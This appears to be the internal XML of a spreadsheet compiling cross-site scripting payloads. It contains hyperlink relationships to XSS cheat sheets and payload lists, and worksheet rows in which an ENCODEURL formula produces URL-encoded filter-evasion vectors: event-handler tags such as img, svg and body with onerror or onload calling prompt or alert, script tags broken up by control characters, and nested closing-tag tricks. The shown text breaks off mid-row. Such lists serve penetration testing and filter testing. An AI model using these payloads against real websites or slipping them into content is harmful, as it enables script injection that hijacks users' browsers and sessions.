      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="17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github.com/payloadbox/xss-payload-list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portswigger.net/web-security/cross-site-scripting/cheat-sheet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github.com/terjanq/Tiny-XSS-Payloads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github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brutelogic.com.br/blog/building-xss-polyglots/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.ostorlab.co/polyglot-xss.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/michenriksen/d729cd67736d750b3551876bbedbe626" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing4.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sciencedirect.com/science/article/pii/S1084804518302042?casa_token=vWFWf9p_aScAAAAA:Kj38YOpSb-aQ6Ltlt1eou0ksKTg8QdSA4TsnhVFUfeoHAj7jlO0Goz0J4WH2OswwBvUS2lhSCg" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://brightsec.com/blog/cross-site-scripting-xss/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://devdojo.com/mariamrebaalexander/cross-site-scripting-xss-attack-part-3" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1202479322184986624?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1391983957684756480?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1201816906853953536?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1201817936542994433?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1377823682907738113?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1197436457889218561?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1389110580355682306?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1197437069435555840?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1351410136120758272?s=20&amp;t=wtUWdUsxDxAjVlSI0Rq-VA" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing5.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1372046735745429504?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1191294931274518533?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1488066834846863361?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/PortSwiggerRes/status/1483022028349321217?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1480847340961468417?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1465168176266846209?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1420285984718172162?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1348494411177594887?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1349937826234855425?s=20&amp;t=wtUWdUsxDxAjVlSI0Rq-VA" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1310448726129938433?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1313343975181504512?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1445291332491255808?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1442746827397345280?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1299206567850586113?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1432354432633683970?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1422826849957302280?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1290869957924982784?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1298876497776828416?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1418451457695694849?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1262237285766115329?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1419496628952698885?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1276386591972438017?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1417027475675262978?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1255344531123380224?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1418448229138681857?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1258227668887183360?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1412674657971576834?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1225426346366701568?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1417021561702436872?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1252833695611777025?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1408318608636272641?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1203945018861465601?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1409377277352239109?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1213991455892488192?s=20&amp;t=6Dkr5ZLqsNJ1eo-4L9dB7A" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1400307415174811651?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/XssPayloads/status/1408318435482759172?s=20&amp;t=Bf3d4GMmpLIH4mTroxVuKw" TargetMode="Externa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github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/XSS%20in%20Angular.md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s://netsec.expert/posts/xss-in-2021/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netsec.expert/posts/xss-in-2021/index.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://netsec.expert/posts/xss-in-2021/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Proviesec/xss-payload-list" TargetMode="External"/><Relationship Id="rId5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3.0"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="3" t="s">
        <v>2</v>
      </c>
      <c r="B2" s="4" t="str">
        <f t="shared" ref="B2:B2602" si="1">ENCODEURL(A2)</f>
        <v>-prompt%288%29-</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="B3" s="4" t="str">
        <f t="shared" si="1"/>
        <v>-prompt%288%29-%27</v>
      </c>
      <c r="F3" s="6" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="3" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ba%3Dprompt%2Ca%28%29%2F%2F%27%3Ba%3Dprompt%2Ca%28%29%2F%2F%27-eval%28window%5B%27pro%27%252B%27mpt%27%5D%288%29%22%29-%27</v>
      </c>
      <c r="F4" s="7" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="3" t="s">
        <v>7</v>
      </c>
      <c r="B5" s="4" t="str">
        <f t="shared" si="1"/>
        <v>-eval%28window%5B%27pro%27%252B%27mpt%27%5D%288%29%22%29-%22</v>
      </c>
      <c r="F5" s="6"/>
    </row>
    <row r="6">
      <c r="A6" s="3" t="s">
        <v>8</v>
      </c>
      <c r="B6" s="4" t="str">
        <f t="shared" si="1"/>
        <v>onclick%3Dprompt%288%29%3E%40x.y</v>
      </c>
      <c r="F6" s="6"/>
    </row>
    <row r="7">
      <c r="A7" s="3" t="s">
        <v>9</v>
      </c>
      <c r="B7" s="4" t="str">
        <f t="shared" si="1"/>
        <v>onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%40x.y</v>
      </c>
      <c r="F7" s="6" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="3" t="s">
        <v>11</v>
      </c>
      <c r="B8" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimage%2Fsrc%2Fonerror%3Dprompt%288%29%3E</v>
      </c>
      <c r="F8" s="6" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="3" t="s">
        <v>13</v>
      </c>
      <c r="B9" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%2Fsrc%2Fonerror%3Dprompt%288%29%3E</v>
      </c>
      <c r="F9" s="6" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="3" t="s">
        <v>15</v>
      </c>
      <c r="B10" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimage%20src%2Fonerror%3Dprompt%288%29%3E</v>
      </c>
      <c r="F10" s="6" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="3" t="s">
        <v>17</v>
      </c>
      <c r="B11" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%2Fonerror%3Dprompt%288%29%3E</v>
      </c>
      <c r="F11" s="6" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="3" t="s">
        <v>19</v>
      </c>
      <c r="B12" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimage%20src%20%3Dq%20onerror%3Dprompt%288%29%3E</v>
      </c>
      <c r="F12" s="6" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="3" t="s">
        <v>21</v>
      </c>
      <c r="B13" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%20%3Dq%20onerror%3Dprompt%288%29%3E</v>
      </c>
      <c r="F13" s="6"/>
    </row>
    <row r="14">
      <c r="A14" s="3" t="s">
        <v>22</v>
      </c>
      <c r="B14" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fscrip%3C%2Fscript%3Et%3E%3Cimg%20src%20%3Dq%20onerror%3Dprompt%288%29%3E</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>23</v>
      </c>
      <c r="G14" s="3">
        <v>1612.0</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="3" t="s">
        <v>24</v>
      </c>
      <c r="B15" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx20type%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>25</v>
      </c>
      <c r="G15" s="3">
        <f>2601-1612</f>
        <v>989</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="3" t="s">
        <v>26</v>
      </c>
      <c r="B16" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx3Etype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="3" t="s">
        <v>27</v>
      </c>
      <c r="B17" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Dtype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="3" t="s">
        <v>28</v>
      </c>
      <c r="B18" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx09type%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="3" t="s">
        <v>29</v>
      </c>
      <c r="B19" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Ctype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="3" t="s">
        <v>30</v>
      </c>
      <c r="B20" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx2Ftype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="3" t="s">
        <v>31</v>
      </c>
      <c r="B21" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%5Cx0Atype%3D%22text%2Fjavascript%22%3Ejavascript%3Aalert%281%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="s">
        <v>32</v>
      </c>
      <c r="B22" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%3E%3C%5Cx3Cscript%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="s">
        <v>33</v>
      </c>
      <c r="B23" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%60%22%3E%3C%5Cx00script%3Ejavascript%3Aalert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="3" t="s">
        <v>34</v>
      </c>
      <c r="B24" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fimg%3E</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="3" t="s">
        <v>35</v>
      </c>
      <c r="B25" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Caudio%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Faudio%3E</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="3" t="s">
        <v>36</v>
      </c>
      <c r="B26" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fvideo%3E</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="3" t="s">
        <v>37</v>
      </c>
      <c r="B27" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fbody%3E</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="3" t="s">
        <v>38</v>
      </c>
      <c r="B28" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimage%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fimage%3E</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="3" t="s">
        <v>39</v>
      </c>
      <c r="B29" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fobject%3E</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="3" t="s">
        <v>40</v>
      </c>
      <c r="B30" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="3" t="s">
        <v>41</v>
      </c>
      <c r="B31" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onResize%20svg%20onResize%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onResize%3E</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="3" t="s">
        <v>42</v>
      </c>
      <c r="B32" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ctitle%20onPropertyChange%20title%20onPropertyChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Ftitle%20onPropertyChange%3E</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="3" t="s">
        <v>43</v>
      </c>
      <c r="B33" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20onLoad%20iframe%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fiframe%20onLoad%3E</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="3" t="s">
        <v>44</v>
      </c>
      <c r="B34" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onMouseEnter%20body%20onMouseEnter%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onMouseEnter%3E</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B35" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onFocus%20body%20onFocus%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onFocus%3E</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B36" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onScroll%20frameset%20onScroll%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fframeset%20onScroll%3E</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="3" t="s">
        <v>47</v>
      </c>
      <c r="B37" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20onReadyStateChange%20script%20onReadyStateChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fscript%20onReadyStateChange%3E</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="3" t="s">
        <v>48</v>
      </c>
      <c r="B38" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseUp%20html%20onMouseUp%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseUp%3E</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="3" t="s">
        <v>49</v>
      </c>
      <c r="B39" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onPropertyChange%20body%20onPropertyChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onPropertyChange%3E</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="3" t="s">
        <v>50</v>
      </c>
      <c r="B40" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onLoad%20svg%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fsvg%20onLoad%3E</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="3" t="s">
        <v>51</v>
      </c>
      <c r="B41" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onPageHide%20body%20onPageHide%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onPageHide%3E</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="3" t="s">
        <v>52</v>
      </c>
      <c r="B42" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onMouseOver%20body%20onMouseOver%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onMouseOver%3E</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="3" t="s">
        <v>53</v>
      </c>
      <c r="B43" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onUnload%20body%20onUnload%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onUnload%3E</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="3" t="s">
        <v>54</v>
      </c>
      <c r="B44" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbody%20onLoad%20body%20onLoad%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbody%20onLoad%3E</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="3" t="s">
        <v>55</v>
      </c>
      <c r="B45" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cbgsound%20onPropertyChange%20bgsound%20onPropertyChange%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fbgsound%20onPropertyChange%3E</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="3" t="s">
        <v>56</v>
      </c>
      <c r="B46" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseLeave%20html%20onMouseLeave%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseLeave%3E</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="3" t="s">
        <v>57</v>
      </c>
      <c r="B47" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Chtml%20onMouseWheel%20html%20onMouseWheel%3D%22javascript%3Ajavascript%3Aalert%281%29%22%3E%3C%2Fhtml%20onMouseWheel%3E</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="3" t="s">
        <v>58</v>
      </c>
      <c r="B48" s="4" t="str">
        <f t="shared" si="1"/>
